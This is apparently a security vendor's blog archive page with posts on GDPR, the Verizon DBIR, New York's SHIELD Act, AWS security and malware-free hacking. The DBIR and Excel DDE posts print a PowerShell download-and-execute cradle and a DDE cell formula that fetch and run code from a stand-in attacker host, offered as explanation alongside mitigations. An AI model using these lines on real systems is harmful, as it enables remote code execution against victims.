All posts by Andy Green

Another GDPR Gotcha: HR and Employee Data

Have I mentioned recently that if you’re following the usual data security standards (NIST, CIS Critical Security Controls, PCI DSS, ISO 27001) or common-sense infosec principles (Privacy by Design, or PbD), you shouldn’t have to expend much effort to comply with the General Data Protection Regulation (GDPR)? I still stand by this claim.

Sure, there are some GDPR requirements, such as the 72-hour breach notification, that will require special technology sauce.

There’s also plenty of fine print that will keep CPOs, CISOs, and outside legal counsel busy for the next few years.

US Professional Service Companies Beware!

One of those fine points is how the GDPR deals with employee records. I’m talking about human resources’ employee files, which can cover, besides all the usual identifiers (name, address, and photos), personal details such as health and financial information, employee reviews, family contact information, and more.

EU-based companies and US companies that have been doing business in the EU have long had to deal with Europe’s stricter national laws about employee data.

The GDPR holds a surprise for US companies that are not consumer-oriented and thought that the new law’s tighter security and privacy protections didn’t cover them. In fact, they do.

I’m referring particularly to US financial, legal, accounting, engineering, and other companies providing B2B services that are not in the business of collecting consumer data.

Let me just say it: the GDPR considers employee records to be personal data — that’s GDPR-ese for what we in the US call PII. And companies that have personal data of employees — and who doesn’t? — will have to comply with the GDPR even if they don’t have consumer data.

So if a US accounting firm in the EU has a data breach involving the theft of employee records, then it would have to notify the local supervisory authority within the 72-hour window.

There’s another surprise for US companies. Even if they don’t have a physical presence in the EU but still have employees there — say French or Italian workers are telecommuting — then their employee records would also be covered by the GDPR.

Employees Have Data Privacy Rights

And that also means, with some restrictions, that employees gain privacy rights over their data: they can request, just as consumers do, access to their personnel files, and have the right to correct errors.

There’s even an employee “right to be forgotten”, but only when the data is no longer necessary for the “purposes for which it was collected”. Obviously, employers have a wide claim to employee data, so it’s easy to see that most employee files are protected from being deleted on demand.

But no doubt there’ll be instances where the “right to be forgotten” rule makes sense. Perhaps a vice president of marketing makes a request to HR to take a one-month leave of absence to study bird life in Costa Rica, has second thoughts, and then asks HR to delete the initial application based on his GDPR rights.

More importantly, employees also have the right to consent to the processing of their data. This particular right is not nearly as straightforward as it is for consumers.

Since employee privacy rights under the GDPR are far from simple, law firms and attorneys are filling the Intertoobz with articles on this subject, especially on the consent to processing loopholes.

As it happens, I came across one written by Sara Jodka, an attorney for Columbus-based Dickinson Wright, that is mercifully clear and understandable by non-attorney life forms.

The DPIA Surprise

The key point that Jodka makes is that since employers have leverage over employees, it’s hard for the consent to processing to be “freely given”, which is what the GDPR requires.

Typically, an employee has given consent to processing of her data as part of an employment contract. But since the employee likely had no choice but to sign the contract in order to get the job, the GDPR does not consider this freely given.

So how do employers deal with this?

There is an exception that the GDPR makes: if the employer has “legitimate interests”, then consent is not needed. To prove legitimate interest, the company will have to document why its right to the data outweighs the employee’s privacy rights. Essentially, since consent generally can’t be relied on in the one-sided employer-employee relationship, the employer bears the burden of proving it needs the data.

Though there are some different legal opinions on the types of employee data covered by legitimate interests, sensitive data involved with monitoring of employee computer usage, their location, or perhaps even their travel plans will definitely require employers to take an extra step.

They will have to perform a Data Protection Impact Assessment or DPIA.

On the IOS blog, we’ve been writing about DPIAs for quite a while. It’s required for the processing of sensitive data, such as racial, ethnic, or health-related data. Employee records that contain this information as well as monitoring data will fall under the DPIA rule, which is spelled out in Article 35.

In short: companies using the legitimate interest exception for processing employee records will likely also be conducting data assessments that include analyzing the processing, evaluating the security risks involved, and proposing measures to protect the data.

If you’re finding this a little confusing, you are not alone. However, help is on the way!

I interviewed Sara Jodka earlier this week, and she brilliantly explained the subtleties involved in protecting employee records under the GDPR, and had some great advice for US companies.

Stay tuned. I’m hoping to get the first part of the podcast up next week.

Verizon 2018 DBIR: Phishing, Stolen Passwords, and Other Cheap Tricks

Like the rest of the IT security world last week, I had to stop everything I was doing to delve into the latest Verizon Data Breach Investigations Report. I spent some quality time with the 2018 DBIR (after a few espressos), and I can sum it all up in one short paragraph.

Last year, companies faced financially driven hackers and insiders, who use malware, stolen credentials, or phishing as attack vectors. They get in quickly and then remove payment card information, PII, and other sensitive data. It often takes IT staff months to even discover there’s been a breach.

I just played a trick on you.

The above paragraph was taken word for word from my analysis of the 2016 DBIR. Depressingly, this same analysis applies to the 2018 DBIR and has been pretty spot on for the last few years of Verizon reports.

Swiss Cheese

The point is that hackers have found a very comfortable gig that’s hard to defend against. According to this year’s DBIR, stolen credentials and phishing take the first and third slots in the report’s table of top 20 actions in breaches. (RAM scrapers, by the way, hold the second slot and are used heavily in POS attacks.)

How big a problem are stolen credentials — user names and passwords previously hacked from other sites?

In a post late last year, Brian Krebs explored the dark market in hot passwords. A hacker can buy a vanilla user name and password combination for around $15. But the price goes up to $60 for active accounts of military personnel, and tops out at $150 for active credentials from an online electronics retailer.

Let’s face it, credentials are relatively inexpensive, and, as it turns out, they are also plentiful. A study by Google puts the number of credentials available on the black market at almost two billion.

Obviously, this is very bad news. Until we have wider use of multi-factor authentication, hackers can get around perimeter defenses to harvest even more credentials and other personal data and then sell them back on the black market. In other words, there’s an entire dark economy at work to make it all happen.

And if hackers don’t have the cash to buy credentials in bulk, they can use phishing techniques to get through the digital door. There is a small ray of hope about phishing: the DBIR says that 80% of employees never click. Of course, the bad news is that 20% will.

Dr. Zinaida Benenson, our go-to expert on phishing, reported a similar percentage of clickers in her phishing experiments (which we wrote about last year): anywhere between 20% and 50% clicked, depending on how the message was framed.

It only takes one employee to take the bait for the hackers to get in. You can run your own Probability-101 calculation, as I did here, to discover that with near certainty a good phish mail campaign will succeed in placing a malware payload on a computer.
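If you want to run the numbers yourself, here’s a minimal PowerShell sketch of that Probability-101 calculation. The 20% click rate comes from the DBIR; the 50-recipient campaign size is my own hypothetical:

# Chance that at least one recipient clicks: 1 - (probability that nobody clicks).
$clickRate  = 0.20   # DBIR: roughly 20% of employees click
$recipients = 50     # hypothetical phishing campaign size
$pAtLeastOneClick = 1 - [math]::Pow(1 - $clickRate, $recipients)
"{0:P3} chance of at least one click" -f $pAtLeastOneClick
# With these numbers, it's about 99.999% -- near certainty, as promised.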

In short: standard perimeter security defenses protecting against phishing attacks or hackers using stolen or weak credentials begin to resemble a beloved dairy product from a mountainous European country.

Scripty Malware

According to the DBIR, phish mail is the primary way malware enters an organization: their stats say it carries the hackers’ evil software over 90% of the time. Hackers don’t have to waste time finding openings in websites using injection attacks or other techniques: phishing is very effective and easier to pull off.

This year’s DBIR also has some interesting insights (see below) into the format of the malware that eventually lands inside the organization. The hackers are using scriptware — either JavaScript or VBScript — far more than binaries.

Source: Verizon 2018 DBIR

And it makes sense! It’s incredibly simple to write these scripts — this non-technical blogger could even do it — and make them appear as, say, clickable PDF files in the case of JS or VBS, or insert a VBA script directly into a Word or Excel doc that will execute on opening.

You can learn about these malware-free techniques by reading my epic series of posts on this topic.

The attackers can also cleverly leverage the built-in script environments found in Microsoft Office. There’s even a completely no-sweat code-free approach that takes advantage of Microsoft Word’s DDE function used in embedded fields — I wrote about it here.

Typically, this initial payload allows the hackers to get a foot in the door, and its evil purpose is to then download more sophisticated software. The malware-free series, by the way, has real-world samples that show how this is done. Feel free to study them.

To quickly summarize: the MS Office scriptware involves launching a PowerShell session and then using the WebClient command to download the next stage of the attack over an HTTP channel.
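Here’s a minimal, deliberately unobfuscated sketch of that download cradle. The URL is a placeholder, and real attacks bury every one of these tokens under layers of obfuscation:

# Stage one: pull the next stage of the attack over HTTP and run it in
# memory -- nothing is written to disk. The URL is a harmless placeholder.
$webClient = New-Object System.Net.WebClient
$nextStage = $webClient.DownloadString('http://attacker.example/stage2.ps1')
Invoke-Expression $nextStage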

Needless to say, the malware-free techniques — Office scripts, PowerShell, HTTP — are very hard to detect using standard security monitoring tools. The scripts themselves are heavily obfuscated — see my PowerShell obfuscation series to understand the full impact — and are regularly tweaked, so defenses that rely on scanning for specific keywords or calculating hashes are useless.

The Verizon 2018 DBIR validates what I’m saying. Their stats indicate that 70-90% of malware samples are unique to an organization. Or as they put it:

… basically boil down to “AV is dead.” Except it’s not really. Various forms of AV, from gateway to host, are still alive and quarantining nasty stuff every day. “Signatures alone are dead” is a much more appropriate mantra that reinforces the need for smarter and adaptive approaches to combating today’s highly varied malware.

Towards a Better 2018

If you’ve been paying attention, then not too much of what the Verizon DBIR is saying should come as a shock. However, I do encourage you to read the introductory summary and then skip down to the industry vertical section to get more specifics relevant to your situation — mileage does vary. For example, ransomware is rampant in healthcare, and Remote Access Trojans (RATS) are more prevalent in banking.

And now for my brief sermon on what to do about the DBIR’s bleak statistics.

Perimeter defenses are not effective in keeping hackers out. You need them, just as you need locks on windows and doors, but the hackers have found simple and cheap methods to get around these security measures.

To make 2018 a better security year, your first step is to admit that expensive firewalls and scanner infrastructure won’t solve everything — admit it right now, and take a huge weight off your shoulders — and so secondary defenses have to be in place.

This means finding and putting more restrictive access rights on your sensitive data files to limit what the hackers can potentially discover, and then using monitoring techniques that alert your security teams if the attackers access these files.

Want to move beyond perimeter security? Click here to request a free risk assessment today!

SHIELD Act Will Update New York State’s Breach Notification Law

Those of you who have waded through our posts on US state breach notification laws know that there are very few states with rules that reflect our current tech realities. By this I mean there are only a handful that consider personally identifiable information (PII) to include internet-era identifiers, such as email addresses and passwords. And even fewer that would require a notification to state regulators when a ransomware attack occurs.

Access Alone, or Access and Acquire, That is the Question!

Remember the loophole in state breach laws with respect to ransomware?

Just about all state notification laws define a breach to be unauthorized access and acquisition. Since ransomware merely accesses the data — it encrypts it — without copying or exfiltrating it, such an attack would not have to be reported under that definition.

I’ve been able to find only three states — though there may be more lurking — that consider a breach to be either access or acquisition: New Jersey, Connecticut, and, most recently, North Carolina.

But late last year, New York began making a bid to join this elite club. The NY Attorney General Eric Schneiderman proposed the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act) to “close major gaps in New York’s data security laws, without putting an undue burden on businesses.”

NY’s SHIELD — love that abbreviation — will update the state’s legal definition of a breach to use the “or” word, thereby closing the ransomware gap.

By the way, if you’re wondering whether other federal and international data security laws have ransomware loopholes — they do! — and breach notification legalese brings out your inner attorney, you’ll love our in-depth white paper on this very subject.

Anyway, the AG also proposes to tweak the state’s current PII definition to now encompass user name or email address (along with a password), biometric data, and even HIPAA-style protected health information or PHI.

NYS Senate Bill S6933A: Access to OR acquisition. Got that?

The Data Empire State

Those who love the wonky details can peruse the SHIELD Act here and review all the changes it will make to the current legal language on the books.

SHIELD will also require something new: companies will need “reasonable administrative, technical, and physical safeguards for sensitive data” — the standard boilerplate that we see in many federal laws. This is as non-prescriptive as it gets, so for now this mostly serves as a warning to companies to have some minimal security policies and procedures in place.

SHIELD is just a legislative proposal at this point, and has yet to be finalized and passed by the legislature. We still have a long way to go. But once that happens, I expect we’ll get additional guidance on some of the law’s nuances from the state. We’ll keep you posted.

I’d like to point out that the SHIELD Act covers any company that does business in NYS. This means that it does have a GDPR-like extended territorial scope aspect to it — in this case, the law crosses state boundaries. In other words, if a California-based e-commerce company collects data from NYS residents, then they would be covered by SHIELD, and would have to report, for example, an exposure or access of PII to NYS authorities.

Yeah, there are some legal questions about whether NYS can assert jurisdiction in other states.

One last wonky point: New York State’s other data security law, the Department of Financial Services’ (NYSDFS) own cyber regulations, covers banks and financial companies. It also has breach notification rules, which we wrote about here.

In short: New York’s financial companies are covered by the NYSDFS regs; for everyone else, the SHIELD Act will apply.

With all this data security legal innovation, New York is at the forefront among states in protecting data and setting a bar — although initially low — for security practices for anyone doing business in the Empire State.

Varonis Perspective

With the Facebook hearings just about over, it appears that Congress may legislate at a national level, at least in terms of data privacy. There are many proposed breach notification and data protection laws kicking around Congress, and a much-needed national law may be on the horizon.

The data security legal winds are changing! Why wait to be taken by surprise at a later date?

You can start preparing by reviewing existing security plans and procedures, paying particular attention to incident or breach response. To support NY’s breach rule requiring notification on unauthorized access to PII, you’ll need to be able to classify your file system data, and then alert IT security when specific types of sensitive file data are accessed in an unusual way.

Not everyone, ahem, can do this!

You’ll also find that the Varonis site to be an incredibly rich resource for data security wisdom. We have many posts and white papers on existing standards and their controls — PCI DSS, NIST 800 family, SANS Critical Security Controls (CSC) — that will provide ideas and inspiration for meeting New York’s new rules.

And we explain how Varonis can help with our DatAdvantage, DatAlert, and DataPrivilege products.

Need to know more? Click here to request a free risk assessment today!

What Experts Are Saying About GDPR

You did get the memo that the GDPR goes into effect next month?

Good! This new EU regulation has a few nuances and uncertainties that will generate more questions than answers over the coming months. Fortunately, we’ve spoken to many attorneys with deep expertise in GDPR. To help you untangle GDPR, the IOS staff reviewed the old transcripts of our conversations, and pulled out a few nuggets that we think will help you get ready.

Does the GDPR cover US businesses? Is the 72-hour breach notification rule strict? Do you need a DPO? We have the answers below! If you have more time, listen to our podcasts for deeper insights.

Privacy By Design Raised the Bar

Inside Out Security: Tell us about GDPR, and its implications on Privacy by Design.

Dr. Ann Cavoukian: For the first time, right now the EU has the General Data Protection Regulation, which passed for the first time, ever. It has the words, the actual words, “Privacy by Design” and “Privacy as the default” in the statute.

What I tell people everywhere that I go to speak is that if you follow the principles of Privacy by Design, which in itself raised the bar dramatically from most legislation, you will virtually be assured of complying with your regulations, whatever jurisdiction you’re in.

Because you’re following the highest level of protection. So that’s another attractive feature about Privacy by Design is it offers such a high level of protection that you’re virtually assured of regulatory compliance, whatever jurisdiction you’re in.

US Businesses Also Need To Prepare for GDPR

Inside Out Security: What are some of the concerns you’re hearing from your clients on GDPR?

Sue Foster: When I speak to my U.S. clients, if they’re a non-resident company that promotes goods or services in the EU, including free services like a free app, for example, they’ll be subject to the GDPR. That’s very clear.

Also, if a non-resident company is monitoring the behavior of people who are located in the EU, including tracking and profiling people based on their internet or device usage, or making automated decisions about people based on their personal data, the company is subject to the GDPR.

Is the 72-hour rule as strict as it sounds?

Inside Out Security: What we’re hearing from our customers is that the 72-hour breach rule for reporting is a concern. And our customers are confused — and after looking at some of the fine print, we are as well! So I’m wondering if you could explain breach reporting in terms of thresholds: what needs to happen before a report is made to the DPAs and consumers?

Sue Foster: So you have to report the breach to the Data Protection Authority as soon as possible, and where feasible, no later than 72 hours after becoming aware of the breach.

How do I know if a breach is likely to ‘result in a risk to the rights and freedoms of natural persons’?

There is actually a document you can look at to tell you what these rights and freedoms are. But you can think of it basically in common sense terms. Are the person’s privacy rights affected, are their rights and the integrity of their communications affected, or is their property affected?

If you decide that you’re not going to report after you go through this full analysis and the DPA disagrees with you, now you’re running the risk of a fine of up to 2% of the group’s global turnover … or gross revenue around the world.

But for now, and I think for the foreseeable future, it’s going to be about showing your work, making sure you’ve engaged, and that you’ve documented your engagement, so that if something does go wrong, at least you can show what you did.

What To Do When You Discover A Breach

Inside Out Security: What are some of the most important things you would do when you discover a breach? I mean, if you could prioritize in any way, how would you advise a customer about how to have a breach response program in a GDPR context?

Sheila FitzPatrick: Yeah. Well first and foremost, you do need to have in place, before a breach even occurs, an incident response team that’s not made up of just IT. Because normally organizations have an IT focus. You need to have a response team that includes IT, your chief privacy officer. And if the person… normally a CPO would sit in legal. If he doesn’t sit in legal, you want a legal representative in there as well. You need someone from PR, communications that can actually be the public-facing voice for the company. You need to have someone within Finance and Risk Management that sits on there.

So the first thing to do is to make sure you have that group in place that goes into action immediately. Secondly, you need to determine what data has potentially been breached, even if it hasn’t. Because under GDPR, it’s not… previously it’s been if there’s definitely been a breach that can harm an individual. The definition is if it’s likely to affect an individual. That’s totally different than if the individual could be harmed. So you need to determine okay, what data has been breached, and does it impact an individual?

So, as opposed to if company-related information was breached, there’s a different process you go through. Individual employee or customer data has been breached, the individual, is it likely to affect them? So that’s pretty much anything. That’s a very broad definition. If someone gets a hold of their email address, yes, that could affect them. Someone could email them who is not authorized to email them.

So you have to launch into that investigation right away, and then classify the data that’s been subject to any intrusion — determine what that data is classified as.

Is it personal data?

Is it personal sensitive data?

And then rank it based on is it likely to affect an individual?

Is it likely to impact an individual? Is it likely to harm an individual?

So there could be three levels.

Based on that, what kind of notification? So if it’s likely to affect or impact an individual, you would have to let them know. If it’s likely to harm an individual, you absolutely have to let them know and the data protection authorities know.

Do we need to hire a DPO?

Inside Out Security: An organization must appoint a data protection officer (“DPO”) if, among other things, “the core activities” of the organization require “regular and systematic monitoring of data subjects on a large scale.” Many Varonis customers are in the B2B space, where they do not directly market to consumers. Their customer lists are perhaps in the tens of thousands of recipients up to the lower six-figure range. First, does the GDPR apply to personal data collected from individuals in a B2B context? And second, when does data processing become sufficiently “large scale” to require the appointment of a DPO?

Bret Cohen and Sian Rudgard with Hogan Lovells: Yes, the GDPR applies to personal data collected from individuals in a B2B context (e.g., business contacts).  The GDPR’s DPO requirement, however, is not invoked through the maintenance of customer databases.

The DPO requirement is triggered when the core activities of an organization involve regular and systematic monitoring of data subjects on a large scale, or the core activities consist of large scale processing of special categories of data (which includes data relating to health, sex life or sexual orientation, racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, or biometric or genetic data).

“Monitoring” requires an ongoing tracking of the behaviors, personal characteristics, or movements of individuals, such that the controller can ascertain additional details about those individuals that it would not have known through the discrete collection of information.

Therefore, from what we understand of Varonis’ customers’ activities, it is unlikely that a DPO will be required, although this is another area on which we can expect to see guidance from the DPAs, particularly in the European Member States where having a DPO is an existing requirement (such as Germany).

Whether or not a company is required to appoint a DPO, if the company will be subject to the GDPR, it will still need to be able to comply with the “Accountability” record-keeping requirements of the Regulation and demonstrate how it meets the required standards. This will involve designating a responsible person or team to put in place and maintain appropriate policies and procedures, including data privacy training programs.


Adventures in Malware-Free Hacking, Part V

In this series of posts, we’ve been exploring attack techniques that involve minimal effort on the part of hackers. With the lazy code-free approach I introduced last time, it’s even possible to slip a teeny payload into a DDE field within Microsoft Word. And by opening the document attached to a phish mail, the unwary user lets the attacker gain a foothold on her laptop. To bring the story up to date, Microsoft ultimately closed the door on DDE attacks with a security patch late last year.

The patch adds a registry entry that disables DDE functionality within Word by default. If you still absolutely need this capability, you’re free to update the setting to bring the old DDE capabilities back to the way they were.
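For reference, here’s roughly what flipping that setting looks like. The AllowDDE value and its meanings come from Microsoft’s advisory (ADV170021), and the “16.0” path segment assumes Office 2016, so check it against your own build:

# Re-enable Word DDE after the patch (per Microsoft advisory ADV170021):
#   0 = DDE disabled (the post-patch default)
#   1 = allow DDE requests only to already-running programs
#   2 = fully restore the old DDE behavior
$key = 'HKCU:\Software\Microsoft\Office\16.0\Word\Security'   # 16.0 = Office 2016
Set-ItemProperty -Path $key -Name 'AllowDDE' -Value 2 -Type DWord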

However, the original patch only covered Microsoft Word. Are there DDE capabilities in other Microsoft Office products that can be exploited in code-free style?

Yes, indeed. You can also find them in Excel.

Night of the Living DDE

Before you start shouting into your browser, I’m aware that I left you on the edge of your seat in the previous post describing COM scriptlets. I’ll get to them further below.

Let’s continue with the evil side of DDE, the Excel version.

Just as with Word, Excel’s somewhat hidden DDE capabilities allow you to execute a bit of shell code without breaking a sweat. As a long-suffering Word user, I was familiar with fields and knew a little about DDE functions.

In Excel, I was a little surprised to learn I can execute a command shell from within a cell, as demonstrated in the following:

Did you know you can do this? I didn’t.

This ability to run a Windows shell comes to us courtesy of DDE. (And yes there are other apps to which you can connect using Excel’s embedded DDE features.)

Are you thinking what I’m thinking?

Have the cmd shell in the cell launch a PowerShell session that then downloads and executes a remote string — the trick we’ve been using all along. Like I did below:

You can insert a little PowerShell script to download and execute remote code within Excel. Stealthy!
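In case the screenshot doesn’t come through, this is roughly the shape of the cell formula. The quoting is from my own tinkering and the URL is a placeholder, so treat it strictly as a sketch:

# The Excel cell formula (not PowerShell -- shown here as a comment). Excel
# treats "cmd" as a DDE server and hands it everything between the quotes:
#   =cmd|'/c powershell -NoP -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://attacker.example/s.ps1'')"'!A1
# The cmd shell then runs this familiar one-liner:
powershell -NoP -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/s.ps1')"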

You would, of course, need to explicitly enter the cell to execute this Excel formula.

So how could a hacker force this DDE command to be executed?

When the worksheet is opened, and if not otherwise configured, Excel will try to refresh these DDE links. There have long been options — buried in Trust Center — to either disable or prompt on updating links to external data sources or other workbooks.

Even without the recent patches, you can disable automatic updates of data connections or DDE links. 

Microsoft initially advised companies last year to disable automatic updates to prevent this DDE-based hack from being so easily pulled off in Excel.

These were mitigations, of course, but Microsoft was reluctant to go the same route as they did for Word, which was to provide a registry entry that would disable DDE altogether.

But in January, they bit the bullet and provided patches for Excel 2007, 2010, and 2013 that also turn off DDE by default. This article (h/t Computerworld) nicely covers the details of the patch.

Let’s Go to the Event Logs

In short, Microsoft has cut the power on DDE for MS Word and Excel — if you’ve incorporated their patches — finally deciding that DDE is more like a bug than, ahem, a feature.

If you’ve not, for whatever reason, included these patches in your environment, then you can still reduce the risk of a DDE-based attack by disabling automatic updates or enabling the options that prompt users to refresh links when documents or spreadsheets are opened.

And now an important question: if you’re a victim of this style of attack, would the PowerShell sessions launched by either fields in Word or a shell command in an Excel cell show up in the log?

Q: Are PowerShell sessions launched through DDE logged? A: Yes.

In my obfuscation series, I discussed how PowerShell logging has been greatly improved in recent versions of Windows. So I took a peek at the log (above), and can confirm that even when you’re launching PowerShell sessions directly from a cell function — rather than as a macro — Windows will log the event.
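If you want to peek at your own logs, script block logging lands in the PowerShell operational log as event ID 4104. A quick query, assuming logging is enabled on your box:

# Pull the ten most recent script-block-logging events (ID 4104).
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -MaxEvents 10 |
Select-Object TimeCreated, @{ Name='Script'; Expression={ ($_.Message -split "`n")[0] } }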

I’m not saying it would be easy for IT security to connect all the dots between the PowerShell session, an Excel document, and a phish mail and decide that this is indeed the beginning of the attack. I’ll discuss the consequences of malware-free hacking techniques in my final post in this never-ending series.

Enter the COM Scriptlet

In the previous post, I took on the subject of COM scriptlets. On their own, they are, I suppose, a neat feature that allows you to pass around code, say, JScript, as just another COM object.

But then hackers discovered scriptlets, which, at a minimum, allow them to keep a very low profile on a victim’s computer — “living off the land”. This Derbycon video demos a few resident Windows tools that take remote scriptlets as arguments — regsvr32, rundll32 — and let hackers essentially conduct their attack malware-free. As I showed last time, you can easily launch PowerShell commands using a JScript-based scriptlet.

As it turns out, a very smart security researcher discovered a way to run a COM scriptlet within an Excel document. He found that something called Package is inserted into an Excel cell formula when you try to link to a document or graphic. And Package will accept a remote scriptlet (below).

Yikes, another stealthy code-free technique to launch a shell using COM scriptlets.

After doing low-level code inspection, the researcher learned that this is actually a bug in the Package software. It wasn’t meant to instantiate a COM scriptlet, just file objects.

I’m not sure whether there’s a patch for this yet. In my own exploration in a virtual Amazon WorkSpaces desktop with Office 2010, I was able to reproduce his results. When I tried again the other day, I had no success.

As we finish up this series, I hope I’ve left you with the feeling that there’s a lot of uncertainty in what hackers can do in your environment. Even if you accept all the recent Microsoft Office patches, attackers still have relatively low-effort techniques, through the VBA macros I initially presented, to embed a malware payload into Word or Excel.

And if you’ve not done your patch homework, you’ve made it even easier for them to gain a foothold with code-free hacking and then perform stealthy post-exploitation.

I’ll talk about what this all means for mounting a reasonable security defense in — I promise — my final post in this saga.

Day Tripping in the Amazon AWS Cloud, Part I: Security Overview

I’ve been an occasional user of “the cloud”, a result of working out some data security ideas and threat scenarios in the Amazon EC2 environment. I played at being a system admin while setting up a domain with a few servers, and configuring Active Directory on a controller. My focus was on having a Windows environment in which I could do some pen testing. But there’s more to Amazon Web Services (AWS) than EC2 computing environments, and I decided it was the right time to start exploring more of its services, especially from a security perspective.

There’s No “There” In the Cloud

It’s natural for many in IT (and corporate bloggers with IT backgrounds) to gravitate to EC2. It’s basically a virtual IT facility: Windows operating systems available on different virtual hardware, a virtual network where you don’t have to deal with cables or routers, virtual firewalls, and other network security features.

However, the cloud is more than just a recreation of the IT server room! They call it Amazon Web Services for a reason: Amazon offers computing and storage services removed from their familiar settings.

Get your AWS Services, AWS Services! Lots of choices from the AWS console.

Need just a cloud file system for sharing and working with documents? There’s Amazon WorkDocs.

What if you just want a Windows desktop environment for your small- or mid-size company without having to deal with all the messy server infrastructure? Amazon WorkSpaces is just for you.

Going a step further, what if you just need enormous amounts of raw storage for web applications, and you don’t really care that it’s not organized as a Windows file system? For that, there are Amazon S3 buckets.

Need access to an Active Directory environment? Amazon Directory Service is just the ticket.

In a way the Amazon cloud — and others have similar offerings — is really a collection of separate OS services that are not tied to a specific facility or location: AWS is, of course, accessible everywhere.

AWS IAM, IAM AWS

The first level of security, then, is controlling access to these services. For that, AWS has, what else, an identity and access management system. It’s called — wait for it — IAM.

When I set up my first AWS account to use EC2, I was given root access and the ability to add new users and groups. You can think of these additional users as power users who can create and modify services in the AWS console. They’re the elite admins of the AWS cloud world.

Users can be organized into groups. And if you’re wondering where the access part of IAM comes in, it’s through something called policies. We wrote a little about these JSON-structured things with respect to S3 buckets.

My IAM crew: adminandy, dangeroudan, sleazysal, and sneakysam.

Just as you can associate a policy with a bucket, you can do the same with IAM users. I’ll talk about setting policies for AWS console users in the next post, but let’s say that the Amazon policies ain’t very intuitive.

In my scenario, I set up a policy for an IAM group called Restricted, which allows users only read access to the EC2 part of AWS — in other words, preventing them from launching or stopping Amazon instances. I added two users into the Restricted group: sleazysal and sneakysam.
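To give you a taste before the next post, here’s a hedged sketch of what such a read-only EC2 policy can look like. The policy and file names are mine; the JSON follows the standard IAM policy grammar:

# A minimal read-only EC2 policy: ec2:Describe* covers the read-only API
# calls, and nothing here grants RunInstances or StopInstances.
@'
{
  "Version": "2012-10-17",
  "Statement": [
    { "Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*" }
  ]
}
'@ | Set-Content policy.json

# Attach it to the Restricted group with the AWS CLI:
aws iam put-group-policy --group-name Restricted `
    --policy-name ec2-read-only --policy-document file://policy.json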

By the way, there are additional security protections that Amazon provides for AWS users, including multi-factor authentication — currently supporting only special hardware fobs — and separate security credentials that, as we’ll see, can be used to access Amazon services from within a computing environment through AWS’s special command line interface, or CLI.

Next time we’ll learn more about the not-very-pretty details of policies and something called Amazon Resource Names, or ARNs, which are the way you refer to just about everything in the Amazon-verse.

Keep in mind that IAM covers users at the level of the AWS console. To set up ordinary users and their permissions, you’ll need to work with plain vanilla directory environments, such as Active Directory, which we’ll examine next time through AWS Directory Service.

A completely intuitive access policy for the Restricted user group.

Some Auditing

The AWS console is really a portal for admins to launch EC2 instances and other computing environments, set up buckets, create databases, and of course monitor activities.

AWS does support auditing of AWS services, and this is done through the CloudTrail service. You can think of it as something like Microsoft’s Event Log, but not nearly as pretty — hard to believe, I know! Further on in this series, we’ll learn about Amazon Athena, which is a tool to help you tame the raw Amazon event logs.

Raw and uncooked: Amazon CloudTrail logs. We’ll use Athena to help organize it.

Bucket Brigade

It’s a good time to look at a service that provides a useful real-world application: S3 buckets. Buckets have obvious use cases in storing huge image files for web applications, but they can store any corporate big-data file.

Or in the scenario I worked out, you can think of buckets as a bare-bones file locker (below).

I’m using buckets to store Word docs that I can share with other IAM users!

However, more appropriate for this type of file sharing activity is the Amazon Workdocs service, which we’ll explore next time.

In any case, with S3 buckets you can configure access control lists for different IAM users. And for more sophisticated permissioning, you can also set up more granular policies.

By the way, it’s relatively easy to upload files and other digital objects into the S3 buckets using the Amazon browser interface. There are even third-party apps, one of which I experimented with, that turn this into more of a file locking and sync service.

With some freeware apps, you can turn S3 buckets into a file sharing service. Btw, you’ll need to borrow a user’s IAM credentials to configure them.
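If you’d rather script the uploads than click through the browser, the AWS CLI makes a bucket feel almost like a remote folder. The bucket name below is a placeholder, and the CLI picks up the IAM user’s keys from aws configure:

# Upload, list, and pull back documents (bucket name is a placeholder).
aws s3 cp .\meeting-notes.docx s3://my-file-locker/docs/
aws s3 ls s3://my-file-locker/docs/
aws s3 cp s3://my-file-locker/docs/meeting-notes.docx .\meeting-notes-copy.docx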

What about monitoring and auditing bucket resources?

Amazon does offer a service called Macie, which it describes as “using machine learning to automatically discover, classify, and protect sensitive data in AWS”.

After reviewing Macie, I’d say it’s a data classification service with an alerting function, kind of something like this and this. You could envision, say, some corporate application uploading huge amounts of transactional data monthly from several different locations into an Amazon S3 bucket. Macie would then monitor the bucket data and let you know who’s accessing it, as well as alerting when it finds sensitive PII.

Macie lets you set regular expressions to discover PII patterns, and classify text using static strings — for example, finding the word “proprietary” or “confidential” in a document.
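For flavor, here’s the kind of pattern you’d feed it: a hypothetical SSN-style regex, tested locally in PowerShell rather than lifted from Macie’s console:

# A hypothetical SSN-style regex plus a static-string check, of the kind
# Macie lets you register -- tried out here against sample text.
$ssnPattern = '\b\d{3}-\d{2}-\d{4}\b'
$sample     = 'Employee 042, SSN 078-05-1120, file marked confidential'
[regex]::Matches($sample, $ssnPattern) | ForEach-Object { $_.Value }
$sample -match 'confidential'   # returns True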

I’ll make the point again that Amazon’s built-in tools are not the most informative or easy-to-use. At a minimum, Macie gives you some insights into the Amazon bucket data store.

We’ll see later that it is possible to import S3 bucket objects, using the Amazon command line interface, into a standard Windows environment. And from there, with the right tools, you can do a far better analysis.

Alerts and data classification with Amazon’s Macie.

Let’s take a breath.

We’ve laid out some of the basics of the AWS environment, and looked at a few security and auditing ideas. Next time we’ll take a closer look at some of these AWS security tools.

And then we’ll start getting into more of the meat, by examining practical IT environments — particularly WorkSpaces and WorkDocs — and see what Amazon offers in terms of security.

(Spoiler alert: there ain’t much beyond standard Windows functions.)

Till next time!

[White Paper] Let Varonis Be Your EU GDPR Guide

Everyone knows that when you travel to a strange new country, you need a guide. Someone to point out the best ways to move around, offer practical tips on local customs, and help you get the most out of your experience.

The EU General Data Protection Regulation (GDPR) is a country with its own quirky rules (and steep fines if you don’t do things just right). So may we suggest using Varonis to help you navigate the data compliance and regulatory landscape of GDPR-istan?

We’ve amassed lots of experience in the last few years, talking to GDPR experts, exploring the GDPR’s legal fine print, and analyzing the latest guidelines from the regulators. But you don’t have to go through the back pages of the IOS blog to find it all.

